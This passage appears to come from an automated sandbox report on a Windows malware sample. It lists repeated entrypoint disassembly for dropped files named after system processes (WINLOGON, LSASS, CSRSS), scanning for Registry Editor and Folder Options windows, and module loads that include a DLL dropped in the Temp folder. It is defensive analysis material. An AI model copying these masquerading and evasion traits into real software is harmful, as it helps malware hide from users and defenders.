ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"shell.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Empty.pif\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"New Folder.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"WINLOGON.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4B9B.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4669.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"MrD3_08.scr\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67EE4A8B.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67EE4667.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4A8E.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" searching for class \"RegEdit_RegEdit\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" searching for window \"Registry Editor\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" searching for window \"Folder Options\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" searching for window \"Local Settings\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" searching for class \"ExploreWClass\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" searching for class \"CabinetWClass\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" searching for class \"RebarWindow32\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" searching for class \"ComboBoxEx32\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" searching for class \"ComboBox\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" searching for class \"Edit\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 718d0000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c470000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"ADVAPI32.DLL\" at base 77110000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"CRYPTBASE.DLL\" at base 75140000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"DWMAPI.DLL\" at base 73aa0000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"KERNEL32.DLL\" at base 76ae0000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"SHELL32.DLL\" at base 75950000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"OLE32.DLL\" at base 76800000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"COMCTL32.DLL\" at base 74140000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"OLEAUT32.DLL\" at base 75580000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"CLBCATQ.DLL\" at base 76a50000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74000000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"NTMARTA.DLL\" at base 746b0000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ae0000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"SETUPAPI.DLL\" at base 76f70000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"RPCRT4.DLL\" at base 76c10000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"USER32\" at base 76960000\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750f0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 749e0000\n \"D3_08.exe\" loaded module \"ADVAPI32.DLL\" at base 77110000\n \"D3_08.exe\" loaded module \"CRYPTBASE.DLL\" at base 75140000\n \"D3_08.exe\" loaded module \"DWMAPI.DLL\" at base 73aa0000\n \"D3_08.exe\" loaded module \"KERNEL32.DLL\" at base 76ae0000\n \"D3_08.exe\" loaded module \"SHELL32.DLL\" at base 75950000\n \"D3_08.exe\" loaded module \"OLE32.DLL\" at base 76800000\n \"D3_08.exe\" loaded module \"COMCTL32.DLL\" at base 74140000\n \"D3_08.exe\" loaded module \"OLEAUT32.DLL\" at base 75580000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ae0000\n \"D3_08.exe\" loaded module \"SETUPAPI.DLL\" at base 76f70000\n \"D3_08.exe\" loaded module \"CLBCATQ.DLL\" at base 76a50000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74000000\n \"D3_08.exe\" loaded module \"RPCRT4.DLL\" at base 76c10000\n \"D3_08.exe\" loaded module \"NTMARTA.DLL\" at base 746b0000\n \"D3_08.exe\" loaded module \"USER32\" at base 76960000\n \"D3_08.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750f0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 75580000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 75150000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 74c50000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 749e0000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 77110000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 75140000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 73aa0000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 76ae0000\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 75950000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 76800000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74140000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ae0000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 76a50000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 76f70000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74000000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 746b0000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 76c10000\n \"IExplorer.exe\" loaded module \"USER32\" at base 76960000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750f0000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 718d0000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"D3_08.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c470000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"D3_08.exe\" loaded module \"SXS.DLL\" at base 75150000\n \"D3_08.exe\" loaded module \"CRYPTSP.DLL\" at base 74c50000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 74c50000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 749e0000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 77110000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75140000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 76ae0000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 75950000\n 